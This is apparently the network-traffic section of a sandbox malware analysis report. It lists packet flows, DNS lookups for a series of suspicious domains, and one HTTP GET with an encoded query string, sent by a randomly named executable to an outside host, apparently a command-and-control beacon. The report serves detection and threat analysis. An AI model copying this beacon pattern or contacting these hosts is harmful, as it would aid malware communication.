Nov 15, 2024 04:23:03.520651102 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.520752907 CET	49819	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:03.537136078 CET	49819	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:03.542496920 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542521954 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542531013 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542540073 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542548895 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542567968 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542577028 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542593956 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:03.542603016 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:04.220201015 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:04.250940084 CET	80	49819	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:04.251132965 CET	49819	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:05.042427063 CET	49819	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.063640118 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.069188118 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:06.069273949 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.079778910 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.084773064 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:06.737200975 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:06.737241030 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:06.737545967 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.768035889 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:06.768337965 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.771219015 CET	49820	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:06.776067019 CET	80	49820	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:12.419919014 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:12.425087929 CET	80	49821	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:12.425297976 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:12.439379930 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:12.444366932 CET	80	49821	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:13.615916014 CET	80	49821	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:13.667320967 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:13.801299095 CET	80	49821	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:13.801523924 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:13.974556923 CET	49821	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:14.985445976 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:14.990643978 CET	80	49822	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:14.990859985 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:14.999381065 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:15.004533052 CET	80	49822	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:15.956135988 CET	80	49822	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:16.010987043 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:16.146527052 CET	80	49822	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:16.146842957 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:16.511126041 CET	49822	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:17.536864042 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:17.542000055 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.542102098 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:17.558007956 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:17.562911987 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.562925100 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.562947989 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.562958956 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.562973976 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.563174009 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.563272953 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.563285112 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:17.563297033 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:18.705276966 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:18.764585018 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:18.895467043 CET	80	49823	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:18.895545006 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:19.073553085 CET	49823	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:20.093269110 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:20.098412037 CET	80	49824	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:20.098517895 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:20.113596916 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:20.118684053 CET	80	49824	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:21.060811996 CET	80	49824	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:21.108004093 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:21.401773930 CET	80	49824	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:21.401910067 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:21.403536081 CET	49824	80	192.168.2.4	154.23.184.218
Nov 15, 2024 04:23:21.408288002 CET	80	49824	154.23.184.218	192.168.2.4
Nov 15, 2024 04:23:26.537250996 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:26.542800903 CET	80	49825	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:26.543368101 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:26.560118914 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:26.565488100 CET	80	49825	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:27.460443974 CET	80	49825	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:27.511145115 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:27.607369900 CET	80	49825	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:27.607598066 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:28.073788881 CET	49825	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:29.105950117 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:29.111566067 CET	80	49826	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:29.112019062 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:29.129539967 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:29.135293007 CET	80	49826	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:30.043493032 CET	80	49826	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:30.089396000 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:30.187558889 CET	80	49826	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:30.188088894 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:30.636543036 CET	49826	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:31.656693935 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:31.662767887 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.662935972 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:31.678932905 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:31.684943914 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.684986115 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685015917 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685044050 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685071945 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685100079 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685127020 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685153961 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:31.685182095 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:32.576594114 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:32.620666981 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:32.720666885 CET	80	49827	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:32.721003056 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:33.183547974 CET	49827	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:34.208544970 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:34.214346886 CET	80	49828	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:34.214448929 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:34.225163937 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:34.230766058 CET	80	49828	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:35.106688976 CET	80	49828	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:35.151896000 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:35.393666983 CET	80	49828	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:35.394282103 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:35.397105932 CET	49828	80	192.168.2.4	31.31.196.17
Nov 15, 2024 04:23:35.402334929 CET	80	49828	31.31.196.17	192.168.2.4
Nov 15, 2024 04:23:40.550283909 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:40.555413961 CET	80	49829	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:40.555490971 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:40.597313881 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:40.602418900 CET	80	49829	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:41.410140991 CET	80	49829	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:41.464492083 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:41.535914898 CET	80	49829	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:41.536209106 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:42.105218887 CET	49829	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:43.123183012 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:43.128849030 CET	80	49830	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:43.129208088 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:43.138101101 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:43.143349886 CET	80	49830	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:44.004448891 CET	80	49830	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:44.058192968 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:44.139914989 CET	80	49830	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:44.140033960 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:44.652086973 CET	49830	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:45.672127008 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:45.677639961 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.678153038 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:45.695161104 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:45.700623989 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700664043 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700694084 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700742006 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700777054 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700917959 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700946093 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.700973034 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:45.701001883 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:46.536565065 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:46.589485884 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:46.668541908 CET	80	49831	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:46.668816090 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:47.199099064 CET	49831	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:48.218662977 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:48.224288940 CET	80	49832	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:48.224704027 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:48.236428022 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:48.241712093 CET	80	49832	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:49.063668966 CET	80	49832	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:49.105326891 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:49.190279007 CET	80	49832	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:49.190515041 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:49.192296028 CET	49832	80	192.168.2.4	64.190.63.222
Nov 15, 2024 04:23:49.197279930 CET	80	49832	64.190.63.222	192.168.2.4
Nov 15, 2024 04:23:54.396308899 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:54.401999950 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:54.402239084 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:54.416649103 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:54.422302008 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295253992 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295337915 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295347929 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295680046 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295708895 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295727968 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295746088 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.295875072 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:55.295963049 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:55.438226938 CET	80	49833	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:55.440774918 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:56.490521908 CET	49833	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:57.500020981 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:57.505747080 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:57.506009102 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:57.520132065 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:57.525871992 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398180962 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398286104 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398308039 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398334980 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398351908 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398372889 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398405075 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398426056 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.398718119 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:58.400634050 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:58.543207884 CET	80	49834	217.76.156.252	192.168.2.4
Nov 15, 2024 04:23:58.543704987 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:23:59.027363062 CET	49834	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:00.499959946 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:00.505419970 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.506587982 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:00.521475077 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:00.527141094 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527183056 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527239084 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527282953 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527338028 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527369976 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527398109 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527426958 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:00.527455091 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491540909 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491637945 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491669893 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491704941 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491709948 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:01.491739988 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491776943 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:01.491779089 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.491835117 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:01.491875887 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.542582989 CET	49835	80	192.168.2.4	217.76.156.252
Nov 15, 2024 04:24:01.640068054 CET	80	49835	217.76.156.252	192.168.2.4
Nov 15, 2024 04:24:01.640176058 CET	49835	80	192.168.2.4	217.76.156.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 04:21:32.868016958 CET	55412	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:21:33.368172884 CET	53	55412	1.1.1.1	192.168.2.4
Nov 15, 2024 04:21:49.593355894 CET	57605	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:21:49.608117104 CET	53	57605	1.1.1.1	192.168.2.4
Nov 15, 2024 04:22:03.981817961 CET	50993	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:22:04.428067923 CET	53	50993	1.1.1.1	192.168.2.4
Nov 15, 2024 04:22:17.810709000 CET	54984	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:22:17.849426031 CET	53	54984	1.1.1.1	192.168.2.4
Nov 15, 2024 04:22:31.203064919 CET	53521	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:22:31.235873938 CET	53	53521	1.1.1.1	192.168.2.4
Nov 15, 2024 04:22:44.531383038 CET	64471	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:22:44.566886902 CET	53	64471	1.1.1.1	192.168.2.4
Nov 15, 2024 04:22:57.969477892 CET	51567	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:22:58.403692961 CET	53	51567	1.1.1.1	192.168.2.4
Nov 15, 2024 04:23:11.787679911 CET	62526	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:23:12.415568113 CET	53	62526	1.1.1.1	192.168.2.4
Nov 15, 2024 04:23:26.422070026 CET	60506	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:23:26.529751062 CET	53	60506	1.1.1.1	192.168.2.4
Nov 15, 2024 04:23:40.424480915 CET	62459	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:23:40.545955896 CET	53	62459	1.1.1.1	192.168.2.4
Nov 15, 2024 04:23:54.203640938 CET	64468	53	192.168.2.4	1.1.1.1
Nov 15, 2024 04:23:54.392708063 CET	53	64468	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 04:21:32.868016958 CET	192.168.2.4	1.1.1.1	0xa88	Standard query (0)	www.huiguang.xyz	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:21:49.593355894 CET	192.168.2.4	1.1.1.1	0x5f35	Standard query (0)	www.beingandbecoming.ltd	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:03.981817961 CET	192.168.2.4	1.1.1.1	0x7218	Standard query (0)	www.futurevision.life	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:17.810709000 CET	192.168.2.4	1.1.1.1	0x7b7f	Standard query (0)	www.schedulemassage.xyz	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:31.203064919 CET	192.168.2.4	1.1.1.1	0x3e12	Standard query (0)	www.mcfunding.org	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:44.531383038 CET	192.168.2.4	1.1.1.1	0xe76	Standard query (0)	www.migorengya8.click	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:57.969477892 CET	192.168.2.4	1.1.1.1	0x8bc8	Standard query (0)	www.klohk.tech	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:11.787679911 CET	192.168.2.4	1.1.1.1	0xf50c	Standard query (0)	www.d63dm.top	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:26.422070026 CET	192.168.2.4	1.1.1.1	0xc5a4	Standard query (0)	www.servannto.site	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:40.424480915 CET	192.168.2.4	1.1.1.1	0x5de2	Standard query (0)	www.telforce.one	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:54.203640938 CET	192.168.2.4	1.1.1.1	0xdb46	Standard query (0)	www.cesach.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 04:21:33.368172884 CET	1.1.1.1	192.168.2.4	0xa88	No error (0)	www.huiguang.xyz		154.92.61.37	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:21:49.608117104 CET	1.1.1.1	192.168.2.4	0x5f35	No error (0)	www.beingandbecoming.ltd	beingandbecoming.ltd		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 04:21:49.608117104 CET	1.1.1.1	192.168.2.4	0x5f35	No error (0)	beingandbecoming.ltd		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:21:49.608117104 CET	1.1.1.1	192.168.2.4	0x5f35	No error (0)	beingandbecoming.ltd		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:04.428067923 CET	1.1.1.1	192.168.2.4	0x7218	No error (0)	www.futurevision.life		203.161.49.193	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:17.849426031 CET	1.1.1.1	192.168.2.4	0x7b7f	No error (0)	www.schedulemassage.xyz	schedulemassage.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 04:22:17.849426031 CET	1.1.1.1	192.168.2.4	0x7b7f	No error (0)	schedulemassage.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:17.849426031 CET	1.1.1.1	192.168.2.4	0x7b7f	No error (0)	schedulemassage.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:31.235873938 CET	1.1.1.1	192.168.2.4	0x3e12	No error (0)	www.mcfunding.org	mcfunding.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 04:22:31.235873938 CET	1.1.1.1	192.168.2.4	0x3e12	No error (0)	mcfunding.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:31.235873938 CET	1.1.1.1	192.168.2.4	0x3e12	No error (0)	mcfunding.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:44.566886902 CET	1.1.1.1	192.168.2.4	0xe76	No error (0)	www.migorengya8.click	migorengya8.click		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 04:22:44.566886902 CET	1.1.1.1	192.168.2.4	0xe76	No error (0)	migorengya8.click		198.252.98.54	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:22:58.403692961 CET	1.1.1.1	192.168.2.4	0x8bc8	No error (0)	www.klohk.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:12.415568113 CET	1.1.1.1	192.168.2.4	0xf50c	No error (0)	www.d63dm.top	d63dm.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 04:23:12.415568113 CET	1.1.1.1	192.168.2.4	0xf50c	No error (0)	d63dm.top		154.23.184.218	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:26.529751062 CET	1.1.1.1	192.168.2.4	0xc5a4	No error (0)	www.servannto.site		31.31.196.17	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:40.545955896 CET	1.1.1.1	192.168.2.4	0x5de2	No error (0)	www.telforce.one		64.190.63.222	A (IP address)	IN (0x0001)	false
Nov 15, 2024 04:23:54.392708063 CET	1.1.1.1	192.168.2.4	0xdb46	No error (0)	www.cesach.net		217.76.156.252	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.huiguang.xyz

www.beingandbecoming.ltd

www.futurevision.life

www.schedulemassage.xyz

www.mcfunding.org

www.migorengya8.click

www.klohk.tech

www.d63dm.top

www.servannto.site

www.telforce.one

www.cesach.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	154.92.61.37	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:21:33.390450001 CET	542	OUT	GET /hv6g/?A69pk=_b0Tr07p9f0pn&R4qXin=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.huiguang.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
